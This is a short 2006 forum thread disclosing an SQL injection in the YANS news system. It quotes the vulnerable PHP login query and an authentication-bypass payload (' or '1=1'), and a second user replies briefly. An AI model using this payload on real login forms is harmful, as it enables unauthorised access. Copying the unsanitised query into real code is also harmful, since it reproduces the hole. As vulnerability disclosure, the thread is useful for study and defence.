escalation666 Posted November 8, 2006 Report Share Posted November 8, 2006 Product: YANS (yet another news system)Link: vuln'>http://sourceforge.net/projects/yans/vuln code:$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());simple sql injection' or '1=1' or '1=1-navairum Quote Link to comment Share on other sites More sharing options...
Spy_bit Posted November 21, 2006 Report Share Posted November 21, 2006 wow man asta e sql injecion Quote Link to comment Share on other sites More sharing options...